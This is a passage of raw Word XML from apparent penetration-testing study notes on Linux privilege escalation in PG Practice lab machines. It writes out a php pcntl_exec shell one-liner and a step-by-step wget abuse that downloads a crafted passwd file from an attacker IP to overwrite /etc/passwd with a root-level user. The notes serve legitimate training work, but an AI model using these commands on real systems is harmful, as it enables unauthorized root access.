      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice also adds to /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jswv0t3ggdho" w:id="295"/>
      <w:bookmarkEnd w:id="295"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/start-stop-daemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/start-stop-daemon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was highlighted in yellow by linPEAS and could priv esc using the one liner from GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2374900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="119" name="image119.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image119.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId709"/>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21BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId710">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sorcerer</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1BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021BE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nm4tq1mid3ay" w:id="296"/>
      <w:bookmarkEnd w:id="296"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/php7.4 (but any version works)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId711">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Astronaut</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They just ran the one-liner from </w:t>
      </w:r>
      <w:hyperlink r:id="rId712">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GTFOBins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5424488" cy="1921173"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="367" name="image353.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image353.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId713"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5424488" cy="192117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1C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You just run the last line and point it to your specific php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can ignore the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMD="/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/php7.4 -r "pcntl_exec('/bin/sh', ['-p']);"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pf13j33ow902" w:id="297"/>
      <w:bookmarkEnd w:id="297"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/wget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId714">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Xposedapi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use it to overwrite files. In both writeups I looked at, they both overwrote /etc/passwd since they had LFI so they knew what the original /etc/passwd was so they could append their new creds to the original. But, I think we could possibly just create a brand new /etc/passwd wit nothing but our new user. Or try overwriting /etc/sudoers. Only problem is if we make a mistake, we corrupt the original and can't get it back. But here's the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #1: Create root user hash on my local attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd -1 -salt user3 pass123 $1$user3$rAGRVf5p2jYTqtqOW5cPu/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4635500" cy="990600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="136" name="image124.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image124.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId715"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="46355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21D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #2: Extract target’s /etc/passwd file and add new user to bottom of it locally:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user3:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0:/root/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4762500" cy="673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="137" name="image144.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image144.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId716"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47625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21D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #3: Use wget binary to download the new /etc/passwd file from my attacking machine and overwrite /etc/passwd file on target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget -O /etc/passwd</w:t>
      </w:r>
      <w:hyperlink r:id="rId717">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId718">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.49.112/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1155cc"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4762500" cy="1358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="368" name="image375.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image375.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId719"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47625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21D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #4: Read the /etc/passwd file on the target machine to confirm the file was overwritten (I think they might have used the LFI exploit from earlier)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="635000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="313" name="image305.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image305.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId720"/>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1D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #5: Switch to new user account to escalate Privileges to root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="521"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4000500" cy="3136900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="573" name="image555.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image555.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId721"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="40005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21DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021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1DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021DF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
